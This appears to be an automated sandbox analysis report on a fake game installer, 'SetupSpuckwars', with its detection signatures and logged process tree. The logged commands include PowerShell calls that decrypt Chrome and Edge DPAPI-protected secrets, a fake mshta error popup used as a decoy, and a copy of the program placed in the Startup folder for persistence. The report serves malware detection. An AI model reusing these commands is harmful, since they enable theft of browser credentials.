Windows
Analysis Report
SetupSpuckwars_1.15.5.exe
Overview
General Information
Detection

| Field | Value |
|---|---|
| Score | 52 |
| Range | 0 - 100 |
| Whitelisted | false |
| Confidence | 100% |
Signatures
Drops PE files to the startup folder
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- SetupSpuckwars_1.15.5.exe (PID: 2248) cmdline: `"C:\Users\user\Desktop\SetupSpuckwars_1.15.5.exe"` MD5: 320696B6328D7D82817DA50697FCB673
- spuckwars.exe (PID: 6248) cmdline: `C:\Users\user\AppData\Local\Temp\2ejji115JyJwonCMeC4t6jNhr8O\spuckwars.exe` MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2
- cmd.exe (PID: 5792) cmdline: `C:\Windows\system32\cmd.exe /d /s /c "tasklist"` MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE
- conhost.exe (PID: 6488) cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D
- tasklist.exe (PID: 2752) cmdline: `tasklist` MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA
- spuckwars.exe (PID: 1132) cmdline: `"C:\Users\user\AppData\Local\Temp\2ejji115JyJwonCMeC4t6jNhr8O\spuckwars.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\spuckwars" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1628 --field-trial-handle=1784,i,14736048943842501929,3890017246348461795,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2` MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2
- spuckwars.exe (PID: 2960) cmdline: `"C:\Users\user\AppData\Local\Temp\2ejji115JyJwonCMeC4t6jNhr8O\spuckwars.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\spuckwars" --mojo-platform-channel-handle=2052 --field-trial-handle=1784,i,14736048943842501929,3890017246348461795,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8` MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2
- cmd.exe (PID: 3472) cmdline: `C:\Windows\system32\cmd.exe /d /s /c "tasklist"` MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE
- conhost.exe (PID: 3532) cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D
- tasklist.exe (PID: 5700) cmdline: `tasklist` MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA
- cmd.exe (PID: 6268) cmdline: `C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')"` MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE
- conhost.exe (PID: 5592) cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D
- powershell.exe (PID: 5368) cmdline: `powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,36,243,112,255,236,176,19,21,161,232,5,156,15,224,214,169,185,79,161,35,240,200,160,226,160,19,168,214,186,239,155,235,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,225,241,231,195,97,47,248,22,206,161,226,92,44,44,51,207,166,8,46,136,147,185,84,185,27,183,252,114,164,252,148,168,48,0,0,0,2,140,235,235,139,99,133,55,160,143,64,53,168,135,193,81,10,81,94,101,239,145,72,8,97,176,119,236,164,201,155,27,236,184,11,80,145,31,10,79,199,92,71,166,116,84,131,150,64,0,0,0,33,136,240,246,163,86,84,202,92,12,170,239,80,17,93,81,235,159,209,41,5,212,210,23,106,50,31,57,94,244,205,86,198,111,237,171,160,240,77,231,4,197,113,175,235,153,59,29,176,183,188,244,160,186,186,93,146,97,116,126,129,24,71,225), $null, 'CurrentUser')` MD5: 04029E121A0CFA5991749937DD22A1D9
- cmd.exe (PID: 3916) cmdline: `C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')"` MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE
- conhost.exe (PID: 6488) cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D
- powershell.exe (PID: 4544) cmdline: `powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,82,140,181,59,205,133,36,68,131,195,71,114,10,9,65,24,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,73,231,212,88,131,180,108,13,7,151,85,6,156,66,67,185,57,141,176,137,39,153,232,122,3,148,29,97,139,226,146,101,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,25,208,58,196,147,38,229,71,17,84,57,121,51,122,21,191,192,210,223,56,196,102,132,177,163,7,170,237,170,96,43,123,48,0,0,0,22,214,107,180,137,106,64,43,246,209,3,97,183,60,179,87,35,178,252,209,63,28,6,231,92,233,101,110,37,191,114,95,102,37,85,25,129,162,60,71,136,36,115,191,138,222,1,225,64,0,0,0,221,128,244,169,226,245,40,30,145,232,4,127,240,108,165,92,23,225,199,246,49,201,112,97,127,7,108,202,49,141,230,234,32,54,72,203,159,33,237,81,195,247,232,115,207,194,239,99,114,230,169,121,178,134,199,77,110,131,115,20,107,231,17,6), $null, 'CurrentUser')` MD5: 04029E121A0CFA5991749937DD22A1D9
- spuckwars.exe (PID: 6524) cmdline: `"C:\Users\user\AppData\Local\Temp\2ejji115JyJwonCMeC4t6jNhr8O\spuckwars.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\spuckwars" --mojo-platform-channel-handle=2388 --field-trial-handle=1784,i,14736048943842501929,3890017246348461795,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8` MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2
- cmd.exe (PID: 2584) cmdline: `C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()""` MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE
- conhost.exe (PID: 6352) cmdline: `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` MD5: 0D698AF330FD17BEE3BF90011D49251D
- cmd.exe (PID: 5788) cmdline: `cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"` MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE
- mshta.exe (PID: 5656) cmdline: `mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"` MD5: 0B4340ED812DC82CE636C00FA5C9BEF2
- spuckwars.exe (PID: 5372) cmdline: `"C:\Users\user\AppData\Local\Temp\2ejji115JyJwonCMeC4t6jNhr8O\spuckwars.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\spuckwars" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2492 --field-trial-handle=1784,i,14736048943842501929,3890017246348461795,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2` MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2
- spuckwars.exe (PID: 7092) cmdline: `"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\spuckwars.exe"` MD5: 6DE6C1C8E6ECD92A94595EBC1189C2B2
- cleanup
No configs have been found
No yara matches
System Summary

| Source | Author |
|---|---|
| | Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) |
| | Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) |